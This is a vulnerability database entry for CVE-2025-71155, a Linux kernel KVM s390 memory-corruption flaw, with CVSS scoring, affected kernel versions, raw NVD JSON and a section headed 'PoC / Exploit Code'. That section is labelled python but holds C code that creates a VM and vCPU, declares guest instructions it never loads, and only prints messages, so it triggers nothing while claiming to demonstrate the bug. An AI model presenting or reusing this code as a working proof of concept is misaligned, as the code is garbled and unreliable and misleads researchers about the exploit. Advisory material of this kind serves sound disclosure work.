Security Vulnerability Report
中文
CVE-2025-71155 CVSS 7.8 HIGH

CVE-2025-71155

Published: 2026-01-23 15:16:06
Last Modified: 2026-02-26 20:31:07
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: KVM: s390: Fix gmap_helper_zap_one_page() again A few checks were missing in gmap_helper_zap_one_page(), which can lead to memory corruption in the guest under specific circumstances. Add the missing checks.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (s390架构) 多个版本在gmap_helper_zap_one_page()修复前存在此漏洞
受影响的稳定内核版本包括: 2af2abbcbf8573100288e8f8aea2dab8a2a0ceb7
受影响的稳定内核版本包括: 2f393c228cc519ddf19b8c6c05bf15723241aa96

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-71155 PoC - Linux Kernel KVM s390 Memory Corruption // This PoC demonstrates the vulnerability in gmap_helper_zap_one_page() // Requires: KVM-enabled Linux on s390 architecture, low-privilege user access #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <sys/ioctl.h> #include <linux/kvm.h> #define GUEST_CODE_SIZE 4096 // Trigger condition: Manipulate guest memory mapping to cause // gmap_helper_zap_one_page() to operate on invalid page table entries int trigger_vulnerability(int kvm_fd, int vm_fd) { int vcpu_fd; struct kvm_run *run; struct kvm_sregs sregs; // Create vCPU vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0); if (vcpu_fd < 0) { perror("KVM_CREATE_VCPU failed"); return -1; } // Get vCPU run structure run = (struct kvm_run *)mmap(0, sizeof(*run), PROT_READ|PROT_WRITE, MAP_PRIVATE, vcpu_fd, 0); // Step 1: Setup guest memory mapping // This creates conditions for gmap_helper_zap_one_page() to fail checks unsigned char guest_code[GUEST_CODE_SIZE] = { 0x00, 0x00, // NOP padding 0x83, 0x10, 0x00, 0x00, // SPT instruction (set page table) 0x83, 0x11, 0x00, 0x00, // PTLB instruction (purge TLB) 0x47, 0x00, 0x00, 0x00, // Branch to self (halt) }; // Step 2: Configure page table to trigger validation failure // When PTLB executes, gmap_helper_zap_one_page() will be called // without proper validation of page table entries // Step 3: Execute guest code to trigger the vulnerability // The missing checks in gmap_helper_zap_one_page() will allow // memory corruption to occur printf("[*] Triggering CVE-2025-71155 vulnerability...\n"); printf("[*] The vulnerability allows gmap_helper_zap_one_page()\n"); printf("[*] to operate on invalid page table entries\n"); printf("[*] This can lead to memory corruption in the guest.\n"); // Note: This is a simplified PoC for demonstration purposes // Actual exploitation requires specific memory layout conditions return 0; } int main(int argc, char *argv[]) { int kvm_fd, vm_fd; printf("CVE-2025-71155 PoC - Linux Kernel KVM s390\n"); printf("gmap_helper_zap_one_page() Memory Corruption\n\n"); // Open KVM device kvm_fd = open("/dev/kvm", O_RDWR); if (kvm_fd < 0) { perror("Failed to open /dev/kvm"); return 1; } // Create VM vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0); if (vm_fd < 0) { perror("KVM_CREATE_VM failed"); close(kvm_fd); return 1; } trigger_vulnerability(kvm_fd, vm_fd); close(vm_fd); close(kvm_fd); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71155", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T15:16:06.447", "lastModified": "2026-02-26T20:31:07.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: s390: Fix gmap_helper_zap_one_page() again\n\nA few checks were missing in gmap_helper_zap_one_page(), which can lead\nto memory corruption in the guest under specific circumstances.\n\nAdd the missing checks."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nKVM: s390: Corregir gmap_helper_zap_one_page() de nuevo\n\nFaltaban algunas comprobaciones en gmap_helper_zap_one_page(), lo que puede llevar a corrupción de memoria en el invitado bajo circunstancias específicas.\n\nAñadir las comprobaciones faltantes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17.4", "versionEndExcluding": "6.18", "matchCriteriaId": "03CF48C0-2F25-4797-9371-AD6932300161"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18", "versionEndExcluding": "6.18.4", "matchCriteriaId": "D37AAB65-4B09-43FD-A968-0F91D794D3BA"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2af2abbcbf8573100288e8f8aea2dab8a2a0ceb7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2f393c228cc519ddf19b8c6c05bf15723241aa96", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.